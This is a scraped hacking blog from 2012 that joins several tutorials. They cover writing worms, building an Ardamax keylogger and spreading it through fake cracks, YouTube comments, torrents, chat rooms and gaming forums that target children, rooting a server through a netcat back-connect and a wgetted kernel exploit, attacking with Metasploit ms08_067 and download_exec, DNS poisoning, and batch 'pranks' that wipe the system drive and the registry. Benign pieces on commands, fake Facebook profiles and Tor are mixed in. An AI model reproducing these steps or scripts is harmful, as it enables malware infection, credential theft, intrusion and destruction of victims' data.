seq Print numeric sequences
set Manipulate shell variables and functions
sftp Secure File Transfer Program
shift Shift positional parameters
shopt Shell Options
shutdown Shutdown or restart linux
sleep Delay for a specified time
slocate Find files
sort Sort text files
source Run commands from a file `.'
split Split a file into fixed-size pieces
ssh Secure Shell client (remote login program)
strace Trace system calls and signals
su Substitute user identity
sudo Execute a command as another user
sum Print a checksum for a file
symlink Make a new name for a file
sync Synchronize data on disk with memory

T

tail Output the last part of files
tar Tape ARchiver
tee Redirect output to multiple files
test Evaluate a conditional expression
time Measure Program running time
times User and system times
touch Change file timestamps
top List processes running on the system
traceroute Trace Route to Host
trap Run a command when a signal is set(bourne)
tr Translate, squeeze, and/or delete characters
true Do nothing, successfully
tsort Topological sort
tty Print filename of terminal on stdin
type Describe a command •

U

ulimit Limit user resources •
umask Users file creation mask
umount Unmount a device
unalias Remove an alias •
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scale to another
unset Remove variable or function names
unshar Unpack shell archive scripts
until Execute commands (until error)
useradd Create new user account
usermod Modify user account
users List users currently logged in
uuencode Encode a binary file
uudecode Decode a file created by uuencode

V

v Verbosely list directory contents (`ls -l -b')
vdir Verbosely list directory contents (`ls -l -b')
vi Text Editor
vmstat Report virtual memory statistics

W

watch Execute/display a program periodically
wc Print byte, word, and line counts
whereis Search the user's $path, man pages and source files for a program
which Search the user's $path for a program file
while Execute commands
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un')
Wget Retrieve web pages or files via HTTP, HTTPS or FTP
write Send a message to another user

X

xargs Execute utility, passing constructed argument list(s)
yes Print a string until interrupted
. Run a command script in the current shell
### Comment / Remark

Furthermore, if you would like to learn more of these commands simply type the command prepended with the "man" command. So if you would like to learn more of the "echo" command you would type "man echo". This will then display any documentation and/or manuals for the command. Whilst it is not necessarily to replace the --help parameter, it can be useful for learning more of how the command works.

Misconceptions About Computer Worms

2012-03-17T14:00:00.000+05:30

Misconceptions About Computer Worms And An Insight Into There Creation

Intro

There are a few misconceptions that some members have about Internet Worms and their behavior.all too often i hear people saying "Oh it looks like you have been infected by some kind of worm" and almost 99% of the time they are completely wrong. So here goes my attempt to clear up a few things on worms.

Definition

A computer worm is a self-replicating Malware computer program. It uses a computer network to send copies of itself to other nodes (computers on the network) and it may do so without any user intervention. This is due to security shortcomings on the target computer.

REF:en.wikipedia.org/wiki/Computer_worm

Ok So How?
Common and notorious worms have been pieces of code that use a (mostly 0 day) exploit in a widely used services like IIS or Apache. The advantage of using 0 day exploit is that no-one is patched for it and the longer the delay in the patch the more devastating the worm is.

Internet worms flourish by using the full bandwidth of the victim to scan for more victims to copy its self to, so the more hosts that get infected the more scanning packets hit the internet thus creating a pyramid effect.

The common worm model is a piece of code that when it infects a victim spawns numerous threads (Code Red II used 100), in the case of Code Red II the worm used 99 threads to scan for more victims and one thread as a payload that defaced the web server it was running on and/or attempts to cause Denial of Service Conditions on the white house website.

Study - Slammer Worm

The slammer worm is a perfect example of how successful worms spread INCREDIBLY FAST, the Slammer worm infected 90% of vulnerable targets (targets vulnerable to the MS SQL buffer overflow) within TEN MINUTES of its launch at 05:30 UTC on January 25, 2003. The shear speed of the attack cause the entire internet to slow down, in some cases parts of the internet buckled under the bandwidth usage so much that businesses and home users internet got completely disconnected.

A contributing factor to the speed at which the Slammer worm spread is its use of a single UDP packet to exploit victims. The worm itself was a mere 376 bytes which fit perfectly inside a UDP packet allowing Slammer to simple fire thousands of requests per second using the full bandwidth of the node it had infected.

Propagation - And a look at the rabbit hole
But one thing i have found when researching is that NOT ONE book on the market describes how the worm copies itself from an already infected node to a newly exploited node. So im going to use the fact i have got your attention to put a few ideas i have collected together on how worms copy them selves:

1) A 'Sudo Worm' - This is my name for a worm thats exploit payload downloads itself from a fixed remote server. Thus not propagating entirely by itself (hence the sudo) - However, there is one major disadvantage to this technique, if the worm becomes a problem, the CERT organization have the ability to shut down the one server where the worm copy is located (found by reversing the worm code), thus immobilizing the propagation of every infected node. - I know the smart hackers on here are thinking of a way round this through polymorphic code but eventually the worm still needs to be centralized.

2) Socket sharing - this is the most obfuscated topic in worm creation (so please appreciate that im about to be very vague because this was one whole in my research), the payload of the exploit spawns a socket which then listens for the other infected node to send a binary copy of itself straight from memory to the remote node. This is a fast idea but would only work if the two OS's are identical, thus the code has to get alot larger to accommodate multiple OS/architecture versions of itself (so forget about that one UDP packet )

3) Quines - Quines in my opinion are the most interesting peices of code there is - a quine by definition is a program who's ultimate out put is a copy code itself. (Ill pause to let you think about that) So a worms exploit payload would be a working copy of the worm itself, that would then scan for more victims and run the same exploit, to cause the same payload copy of itself to launch on the victim (and on and on and on). (If your interested in learning about quines and how to code and are willing to follow an adf.ly link to help me out then here you go - QUINES )

Worm Creation - THE TRUTH

In all honesty it is very easy to code an internet worm if you have a grasp of the theory and some coding skill,it requires the following elements of code:

An Ip generator - To create a random ip address to search for new victims.

Here is a vague c ip generator function i made to give you an idea of where to start.

Code:

void octgen(){
int oct[3];
int i;
srand ( time(NULL) );
for(i=0;i<4;i++){oct[i]= rand() % 220 + 1;}
if (oct[0] != 127 ){
printf("%i.%i.%i.%i",oct[0],oct[1],oct[2],oct[3]);
}else{
octgen();
}

}

An Exploit
To rival the success of slammer and code red would require a new 0 day exploit and some fast expert programming to get the worm out before the patch, but for a small worm you could easily rip an exploit of http://inj3ct0r.com/ and still infect a few thousand computers.

An Exploit Payload + Propagation Technique

A propagation technique is the hardest thing in creating worms because the whole subject is obfuscated in books and on the internet to stop everyone making worms, so youll need to either make due with a download and exe payload for your worm and be happy with a sudo worm, or code your own payload for your exploit and find a slightly cleverer way to propagate. For Help with payload programming and finding 0 day exploits i suggest you read (yes kids its a book) The Shellcoders Handbook

A Worm Payload
Now this is where it gets interesting and is up to the coder to be honest, personally you could be happy knowing your worm is on thousands of computers silently doing now damage, however potentially you could have a date triggered payload so that every infected node stops propagating and denial of services a high profile site or strings all nodes into a huge botnet. Some of the more devastating (and clever) worms have stolen international secrets, stolen funds and destroyed thousands of pounds worth of data. But ill leave this up to you.

Conclusion
For those of you that have read this far i hope you have enjoy my little insight into the world of computer worms and have enjoyed a small glimpse into how worms are created in the real world. And now i wont be the only person on HF with my fingers crossed when a new high profile 0 day hits the headlines, and im sat there just waiting for the next worm to ravage the internet.

Happy Hacking. :)

Thanks to sol@ris for this!!!

I'm just a Distributor not the author of this post.

Some Common Terms in Hacking Explained

2012-03-17T13:30:00.000+05:30

Q: What is hacking?

A: The terms "hack" are also used to refer to a modification of a program or device to give the user access to features that were otherwise unavailable, such as DIY circuit bending. It is from this usage that the term "hacking" is often incorrectly used to refer to more nefarious criminal uses such as identity theft, credit card fraud or other actions categorized as computer crime

Q: What is cracking?
A: Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords. On a file-by file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.

Q: What is a virus/trojan/malicious script?

A: A computer virus is a computer program that can copy itself and infect a computer. The term "virus" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer..

Q: What is a stealer?

A: A stealer is a software designed to create viruses. This virus is called as a server. You send the server to the victim and if they open it all their passes (according to how the stealer is built) will be sent to you via email, or ftp or a php webhost.

Q: What is a RAT?

A: A Rat is a software created that created similar servers (virus). If the victim opens it they will be your RAT. You can have a complete access to their system. There are hundereds of features.
RAT - Remote Administration Tool.

Q: What is a keylogger?

A: A keylogger is a software designed to create servers. You send the server to the victim and if they open it all their keystrokes would be sent you via email, ftp, php webhost etc.

Q: What is BOT?

A: A bot is a malicious program which has several purposes.
They are usually told what to do by a botnet admin although many of the features now are automated.

Q: What is a BOTNET?

A: A botnet is a network of infected computers that all connect to one area where they are commanded by the botnet admin.

Q: What is a crypter?

A: All your servers that you create of a keylogger, stealer, RATs etc. are detected by antivirus. So inorder to make it FUD (Fully UnDetectable) we use a crypter and crypt your infected server.

Q: How does a crypter work?

A: A crypter has a built in or external file called stub. This stub is based on common encryptions like rc4, xor, tweafish, blowfish etc. When you crypt your infected file the crypter embeds the stub onto your server and covers the server. Just like how you paint your rusted metals. And makes it undetectable from anti-virus.

Q: What is reverting?

A: Reverting is a technique used to obtain forgotten passwords. But a hacker uses this method to access the victims account.

Q: What is social engineering?

A: It is a psychological approach, where you manipulate people into performing actions or divulging confidential information, rather than by breaking in or using technical hacking techniques (essentially a fancier, more technical way of lying).

Q: What is DDos?

A: DOS - Denial Of Service.
This is using bots. If you have a large number of bots you make them send packets to the target site and make them break down.

Q: How is website and forum hack possible?

A: There are lots of methods. The most basic one is you find exploits on a webserver and use them to gain access and deface it.
Sql, XSS, LFI, RFI, DNS poisoning etc.

Q: Can everyone be hacker?
A: No, u need Curiosity in Hacking and Geeky stuffs, a brain and common sense. ;)

--------------------------------------------------------------------------------------------------

Hope this post help you in understanding some basic terms. :)

Some Useful CMD Commands

2012-03-17T11:30:00.000+05:30

Here are some Useful Things to do on CMD!!

First, open your Network Connection and right click and select Properties. Then Select TCP/IP and click on Properties again. Now Click on Advanced and WINS tab. Select Default for NeBIOS.

Now back to the main Local Area Connection window, select File and Print Sharing for Mic*ft Networks and hit enter.

This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.

First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).

In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, off course... you know the drill).

Back to commands:

Commands:-
nslookup,
net view,
net use,
net user,
ping,
tracert,
arp route,
nbtstat,
netstat
ipconfig.

In case you don't know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.

Lets start easy...

1) ping : This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the "ping" command.

Code:

ping x.x.x.x (x is the IP address)

or

ping http://www.anysite.com (http://www.anysite.com is the website you want to ping, but you don't know the IP)
PS: Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down.

2) nslookup : This command has many functionalities.
One is for resolving DNS into IP.
Lets say you know the website URL but you don't know its IP(and you want to find out).

nslookup http://www.anysite.com (http://www.anysite.com is the website you want to find out the IP)

Now, another really nice function of nslookup is to find out IP of specific Mail Severs.

Code:
nslookup (enter) set type=mx (enter) yahoo.com
This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn't it?

3) tracert : This command will give you the hops that a packet will travel to reach its final destination.

PS: This command is good to know the route a packet takes before it goes to the target box.

Code:
tracert x.x.x.x (x is the IP address)

or

tracert http://www.anysite.com (http://www.anysite.com is the website you don't know the IP)

4) arp : This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.

Code:
arp -a

5) route : This command will show you the routing table, gateway, interface and metric.

Code:
route print

6) ipconfig : This command will show tons of very helpful things.
Your IP, gateway, dns in use.

Code:
ipconfig

or

ipconfig /all
this command will give all that info but for all networks you might have it.

Also, in case you have a dynamic IP and want to change it, then type...

Code:
ipconfig /release (this will release your IP) ipconfig /renew (this will renew your iP)

PS: Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don't do anything stupid.

7) netstat : This command will show you connection to your box.

Code:
netstat

or

netstat -a (this will show you all the listening ports and connection with DNS names) netstat -n (this will show you all the open connection with IP addresses) netstat -an (this will combined both of the above)

8)nbtstat : This command will show you the netbios name of the target box.

Code:
nbtstat -A x.x.x.x (x is the IP address) nbtstat -a computername
net view x.x.x.x or computername (will list the available sharing folders on the target box)

Now some hints:

Code:
net use \ipaddressipc$ "" /user:administrator
(this command will allow you to connect to the target box as administrator)

Now if you want to connect to the target box and browse the entire C drive, then use this command:

Code:
net use K: \computernameC$
(this will create a virtual drive on your "my computer" folder)

PS: Keep in mind that this will only works if the target box doesn't have an administrator password set.

And least but not last, the "help" command.

Code:
whatevercommand /help

or

whatevercommand /?

This command will help you to understand what it does and all the switchs available for each command.
Very useful if you know the command, but forgot the right switch.

:)

How to setup a keylogger(ardamax) and Spread it [Step by Step]

2012-03-16T03:30:00.000+05:30

Ardamax Keylogger 2.85 Complete Download + Tutorial + Guide

Download the keylogger here.

Please Turn off your anti-virus....It is because keylogging is basically a trojan builder it will show detection...I have checked the copy and it is clean version...

SETTING-UP KEYLOGGER:-

1. Once you've downloaded and installed it, you'll see a little notepad icon in your taskbar.

2.Now right-hand click it and click 'Enter registration key...'.

3.Copy/Paste Registration name and Registration key from Serial.

4.Once done click 'Ok' and you should get a pop-up saying 'Registration code is accepted. Thank you for registration!'

II. Creating the Keylogger Engine:

1. Now your going to make the Keylogger Engine (The thing you give to your victim). Click 'Remote Installation...',

click 'Next'

2.Now,you should see this.

3.If you want to bind Keylogger Engine with another application or file click the box that says 'Append keylogger engine to file or another applitacion' and browse file or applitacion that you want to bind it with.

4. Now click 'Additional components' and tick 'Installation Package Bilder' like done in the screenshot.

5.Now you should be at 'Invisibility', make sure all the boxes are ticked, then click 'Next'.

6. Now you should be at 'Security', click 'Enable' and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click 'Next'.

7. Now you should be at 'Web Update', un-tick 'Check for updates' and Click 'Next'.

8. Ok, you should now be at 'Options', use setting like done in screenshots.

Btw you can make your keylogger to self distruct any time you like.

9. Ok, now you should be at 'Control', click the box that says 'Send logs every', now make it so it sends logs every 20 minutes, then where it says 'Delivery', un-tick 'Email' and tick 'FTP', then where it says 'Include' un-tick 'Screenshots', now un-tick the box where it says 'Send only if log size exceeds', once thats done, it should all look like it does in this screenshot:

10. Now you should be at 'FTP', create a free account at http://www.drivehq.com/secure/FreeSignup, then make sure your at 'Online Storage', then make a new folder called: Logs (this is where the logs are sent to when you keylogg someone), Now on your FTP on Ardamax Keylogger, where it says 'FTP Host:', put this:

FTP.DriveHQ.com

Now where it says 'Remote Folder:', put this: Logs

Now where it says 'Userame:' and 'Password:', put your DriveHQ username and password, then it should look something like this:

Now Click 'Test' and it should pop up like this:

Once done, do NOT change your DriveHQ password or rename/delete the folder called 'Logs', if you do, the logs will not come through.

11. You should now be at 'Control', un-tick 'Enable Screenshots Capturing' then click 'Next'.

12. Now you can change name and icon your Keylogger Engine as you want it to look like.

and click 'Next'.

13. Now you should see this.

just click 'Finish'.

14.After you click 'Finish' you should see this:

Click 'Ok'

15.Now your Keylogger engine is created.

The keylogger you created now will be detected by anti-viruses. So you have to bind it to another file and encrypt it using a crypter.
That means making it FUD. (Fully UnDetecable).

Spreading:-

Okay , so there are alot of methods for spreading , i am going to tell you some of them ..

1. Youtube - YouTube is a video sharing website on which users can upload and share videos, millions of people are online... Now , make a video bout a crack , like For Adobe Photoshop , VB.Net , Teamviewer ,(These were just the examples) or any Games , then get your virus FUD(recommended) and Make a video and post. Now , i know alot of people do this , but they dont do 1 thing right. SPreading the video.

How to do this???

GO to http://www.youtube.com and click on Videos , then click on Most Viewed , and then choose All Time

Then go to every single video that has alot of views and post this:

Wow look what i found click on my name and watch the video , it will get ur free shit etc etc.. .

Then you will get loads of people infected.

2.Torrents - This is the most effective way. First you need a torrent client, I use uTorrent, because it's the easiest.Once you get your torrent client, Get some fake stuff , like Steam games Keygen or Cracks or w/e and then put them in a .rar file and put the keylogger on it. (BIND IT) . Now you gotta create the torrents.Open uTorrent , and then go to File -> Create New Torrent And add your .rar file on it, okay so now trackers are needed... These are some good ones:

Then click START SEEDING. Now .. CLick Create -> Save AS... and save anywhere u want
After you saved , go to http://www.thepiratebay.org, Register and upload your torrent

3.Chat Rooms - This is slow but you get adult people ( You can get credit cards and paypals from this). First of all , go to any chat room from any of these below:

1.http://www.chat-avenue.com/teenchat.html
2.http://www.chat-avenue.com/adultchat.html
3.http://www.321teenchat.com/
4.http://www.javachatrooms.net/
5.http://www.freechatnow.com/

And then , upload your file to any free file hosting such as sharesend and then go to chat rooms , and start spamming..!!!

4.Forums - I used to do this when i first started using keyloggers , it was pretty fun actually. NEVER TRY IT ON CRACK HACK FORUM.

First you go to any gaming forum such as http://www.mpgh.net and create a new thread with the name "Free All In One CrossFire HACK" and then post a fake virus scan of ur file and put download link , you will get alot of 12-17 years old kids who play all day RPG games...

5.Impersonating Microsoft - This one doesnt work very well , but you can use this for targeting. First of all go to http://www.passport.net and make a @microsoft.co.uk email... then , add someone you want on that msn and tell him : A new virus has been detected , for your safety , we need you to download this file < LINK> or else your computer may be in danger.

By w4r-b0y

Server Rooting Tutorial + Using h00lyshit Exploit

2012-03-16T01:30:00.000+05:30

I will show you how to exploit a Linux server and gain root access. This will benefit you in many ways, for example having control of all websites hosted on the server. Enough talking, let's begin!

Requirements for this tutorial:

- A shelled website.
- NetCat installed on your computer.
- Patience
- Port 443 or any other except 80 opened on your router.

Okay, first let's navigate to our shell. If the shell is GNY, you will see something like 'Back Connect'. Go there. Now you see 3 textboxes. Bind to bin/shor backconnect. Type in your IP and the port you want the server to connect (it must be opened on your router.). Now do not press backconnect yet. Download NetCat here:

www.downloadnetcat.com

Extract the files to your desktop in a folder. Now go to Run>cmd. Open cmd. Now type:

cd

Replace with the path of netcat. Okay, now type:

nc -lnvp

Replace with the port you opened and used on the shell.

Now it should display something like this:

Listening on port [any] ...

Minimze this window, and go on the web shell. Type in your IP address and port, click backconnect. If you did all right, and the server does not have a firewall and if your ports are forwarded correctly, you should see an incoming connection from the server. You have a shell! Now you can type 'id' to see your current ID. Let's say your ID is 23. You have control over your website only. But not for long. Now type 'uname -a'. You will get the full kernel version. Simply copy it and google for local root exploits. Let's say it is 2.6.18 2008 version... Hmm that is pretty outdated! Well, let's exploit it. Cd to the tmp directory, that is always writeable.

Type this:

cd /tmp

Now let's make a folder for the exploit.

mkdir exploit

cd into this folder.

cd exploit

Now comes the tricky part. We will use h00lyshit exploit for this kernel. Type:

wget http://securityvulns.ru/files/h00lyshit.c

(P.S.- If link broken then download h00lyshit exploit here and upload it ti the same site then use it.)

Now type 'ls'. You should see localroot.c in this folder. We need to compile it. Type:

gcc localroot.c -o h00lyshit

Now type 'ls' and you should see 2 files, localroot.c and h00lyshit. h00lyshit requires a large file on the server in order to get root access, so let's create one. Type this and hit enter:

dd if=/dev/urandom of=largefile count=2M

This will create a large file, where largefile is the name of it. This can take up to 5 minutes. Once ready, chmod hoolyshit and largefile to 777, so:

chmod 777 h00lyshit
chmod 777 largefile

Now let's run the exploit! Type this:

./h00lyshit largefile

Now wait, wait for about 3 minutes. If the kernel is not patched and if it is the right version, you are root! Type 'id' and you will see:

uid=0(root)

You have successfully gained root!!

Some Notepad Hacks and Tricks

2012-03-15T14:30:00.000+05:30

Here are some Notepad Tricks to make your friend/enemy look O.o :O

The blue screen of Death [This might be dangerous]
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again

CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

save it as "Anything.bat"

-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer

CODE
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10

save it as "Anything.bat"

-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)

CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE

save it as "Anything.bat"

-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*

CODE
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

save it as "Anything.bat"

-Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
CODE
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

save it as "Anything.vbs"

-Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*
CODE
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

save it as "Anything.vbs"

-Endless Backspace
*This makes it so the backspace key is constantly being pressed*
CODE
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

save it as "Anything.vbs"

-Popping CD Drives
*This will make the CD drives constantly pop out*
CODE
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

save it as "Anything.vbs"

How to infect victim using his IP address

2012-03-15T01:30:00.000+05:30

Many of the times I saw this question asked everywhere on the internet that
“Is it possible to infect victim using his IP address?”

So, I am going to show you how to do it.(n00b friendly TuT)

Requirements:

Nmap
Metasploit

First of all you need target ip of your victim.

Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to database.]

Once you do that type Nmap.
[Use: This’ll load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV <target ip>
[This’ll scan OS, Ports, and Services running on victim’s computer.]
Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on victim’s computer.

Now it’s time to exploit victim’s machine.
Exploit depends on the OS, Ports, and Services running on victim’s computer.
So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.
No matter weather they’re protected by any firewall or not.

Now I’ll tell you exploiting:-

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Use: This’ll show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Use: This’ll show all targets by exploit]

Now Type set target 0
[Use: This’ll set target to 0 specified]
Then type show payloads
[Use: This’ll bring up all the payloads]
Next type set payload windows/download_exec
[Use: This’ll set payload as windows/download_exec]

Then Type show options
[Use: This’ll show all options in the exploit & payload]
In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST <xxx.xxx.xxx.xxx >
[Use: This’ll set RHOST (victim’s ip) to xxx.xxx.xxx.xxx]

Next Type set URL http://www.xxxx.com/xxx.exe
[Use: This’ll set URL to your direct server link.]

At last you need to type exploit
[Use: This will launch your exploit & your victim will be infected.]

You can now control you're victim with RAT.
So, any versions of Win 2000-XP can be exploited easily.

In case if you didn’t get this two OS’, immediately after Nmap scan
You can use the command db_autopwn –p –t –e.
In most cases you get a shell.
Good Luck!

How To Create A Invisible Account In Windows Xp

2012-03-14T13:00:00.000+05:30

Here is a Quick tutorial on for windows XP on How To Create A Invisible Account In Windows Xp. What we have do in this hack is really simple just create a DWORD value in the windows registry and hack the windows user accounts .

Steps :-

1. Open Start menu then click on RUN.
2. Type in the Run Window Regedit
3. Windows Registry editor will open then navigate from the left panel :

HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList

4. Create a new DWORD, setting its name to the name of the account you wish to hide.
5. Then set its value to 0 to hide it.
6. Enjoy its Hidden !!

NOTE : This account isn't completely hidden because it is visible to administrators in Local User and Groups and also the profile is visible in the Documents and Settings.

Now How To Login In it after you have hidden the account :

1. At Welcome screen, and you want to login to this account.
2. Press Ctrl+Alt+Delete twice and it will display the log-on promt.
3. Type the username, and the password and hit enter.

Comment If you like the post.. :)

How to Detect Fake Facebook Profile

2012-03-14T12:00:00.000+05:30

In Facebook, things are not all as it seems: there are people who are under false names, pictures, interests and even friends. You look at their profile and think “something here does not fit.” These characters seek to trick legitimate users the purpose of sending unsolicited advertising, steal personal information or engage in various scams.

We present a few simple rules to identify fake profiles on Facebook and prevent you from falling prey to this schemes. It’s easier than you think.

A fake profile of Facebook users actively seeks out others, sending friend requests, liking pages and posting messages on walls outside.

Here is something that stands out: no friends in common. What do you know about this guy? How did he/she get to you? The typical user of Facebook joins the invitation of a friend or relative, and often conduct their activities in a well-defined network. Unlike the case of people coming for other purposes.

First look at such profile os even more strange because it is a profile made ??quick and running, all mask, which knows little and says nothing about the person by which you can relate. No more pictures of profile, or if more are not related to each other and have not been labeled by other users or applications.

Main Features of Fake Facebook Profiles

1. Profile Photo of some Celebrity / cartoon ( Something Unreal)

Few can resist the temptation to accept the friendship of a good-looking person, especially if the opposite sex and generous areas of skin showing. However, this is the first thing to put on notice. Would the person you know use that picture? You are adding nothing more than junk to your friend list.

2. Single Profile Photo Album

Most fake profiles have only one or two photographs. To give a sense of verisimilitude, the most skilled rogue attempts to fill photo albums of all kinds, but, here’s the problem, the result difficult to get consistent. The images are of poor quality, without descriptions, tags or comments.

3. Too many friends on such Profile

The details of a fake profile, if they have been refilled, are mostly generic and focused on a single topic or set of issues that appeals to a specific audience, and the same applies to the pages. In summary, the fake profile corresponds to a personality extremely boring. But then how is it that has so many friends? A mystery.

4. Analyze the Friend List

Unless you travel a lot or you like learning new languages, the safest thing is you have less than 200 friends and most live less than a thousand miles from home. If the person adds you have dozens of friends scattered all over the world, thinking that it is a fake profile is reasonable.

5. Meaningless and incomplete Profile Information

It generally consists of Friends, Single, Looking for Relationship and profile is Open to all. Even Wall Posts will consist of crappy posts by applications and similar people like you who became victim. These Messages include ” Hello” ” How are you?”, “Do we know each other”, etc. OR Site Advertorials.

What to do if someone adds you do not know

Above all, do not panic! If someone adds you and do not know who he is, because you do not immediately accept the request, is now Facebook allows you to hide the requests instead of rejecting them. Another thing you can do is ask the contact what you know.

And if you prefer not to ask anything, for your name in Google and see what happens. Finally, keep in mind the golden rule of Facebook: just add acquaintances.

How to report Fake Facebook Profile

On Facebook, report and blocking a fake profile is very simple. In the sidebar of the profile in question, click on “Report / block this person” and select appropriate option. You can also block the person (well, you’ll never be able to add).

So, these were some common signals of Fake Facebook profile. As your experience grows, you will become wiser to detect them in just one look.

How To Perform DNS Poisoning attack

2012-03-14T00:30:00.000+05:30

Hey guys Smile this Tutorial is about DNS poisoning on your network using Cain & Abel.

Download Cain here

This Tutorial Will be limited to just redirecting the traffic to another website.

Note: This Tutorial is for educational purposes only (you’ll be responsible for your own actions)

First What is the DNS ? (wikipedia.org)

The Domain Name System (DNS) is a hierarchical naming system for
computers, services, or any resource connected to the internet or a
private network. It associates various information with domain names
assigned to each of the participants. Most importantly, it translates
domain names meaningful to humans into the numerical (binary)
identifiers associated with networking equipment for the purpose of
locating and addressing these devices worldwide. An often used analogy
to explain the Domain Name System is that it serves as the "phone book"
for the Internet by translating human-friendly computer hostnames into
IP addresses. For example, http://www.example.com translates to 208.77.188.166.

What does poisoning the DNS allow us to do ?

It allows us to redirect the traffic to another website.

First This is the structure of the network :

1- 2 and 3 are computers

1 is the computer being the gateway (could be a router) (172.128.254.1)

2 is the target computer (172.128.254.10)

3 is the attacker using cain

Note : IPs are just used for this tutorial and chosen randomly.

Our work is on computer number 3.

__________________________________________________ ______

1-After you install cain , open it and go to the sniffer tab

2-Click on configure and choose your adapter

3-Enable the sniffer (click on the second icon in the toolbar next to the open icon)

4-Right click in the empty area and choose scan MAC addresses. We get the results above.

5-Click on the APR Tab

6-Click on the + sign in the toolbar to add a new ARP poison routing

7-Choose the gateway which is 172.128.254.1 , in the next list you’ll

get the IP of the computer 2 which is 172.128.254.10 and click ok

8-Now click on the APR-DNS tab

9-click on the + sign

10-enter the web address that you want to spoof , (in this case when the

user goes to facebook he’ll be redirected to myspace) click on resolve

type the web address that you want to redirect the user to it, and click

ok, and you’ll get the IP of the web address, then click ok

you'll get something like this:

11-now to make this work we have to enable APR poisoning , click on the
icon next to the sniffer icon, and everything should work as we expect.

Now the computer 2 will get the routes poisoned and when the user requests http://www.facebook.com he will be redirected to http://www.myspace.com .

Imagine what you can do with this technique.

I hope this was a good tutorial for you guys , and please leave your feedback.

-----------------------

Anonymous Web surfing With TOR

2012-03-13T23:59:00.000+05:30

We all many times use proxies for staying anonymous on internet. Lets quickly check out , what we are actually doing while using proxies. We first connect to a proxy server which brings resources requested by us from the web server.

Thus a proxy server hides our identity by acting as an intermediary between us and the web server that we are accessing. Suppose we break into a server using a proxy server thinking that we are anonymous. But what if owner of web server starts enquiring about the clients connecting to it using the proxy server and it is possible that owners of proxy server might reveal our identity. This means we cant actually rely on proxy servers for being anonymous online. Here comes the concept of THE ONION ROUTING (TOR) into picture. By using this , the client traffic is supposed to be passed from three different servers or nodes before reaching to actual web server. It may randomly take any path through any three nodes.

Lets consider it has taken path shown by green arrows. Now

* Node 1 knows only actual origin(client) but not actual destinantion(web server).
*Node 5 neither knows actual origin nor actual destinantion.
*Node 9 knows actual destination but not actual origin.

Thus no one exactly knows which client is accessing which web server. So it is highly anonymous.

What is Tor?(According to www.torproject.org)
Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis.

Why Anonymity Matters..??
Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location. Tor works with many of your existing applications, including web browsers, instant messaging clients, remote login, and other applications based on the TCP protocol.

TOR Browser

The Best one I would suggest is to use TOR browser.

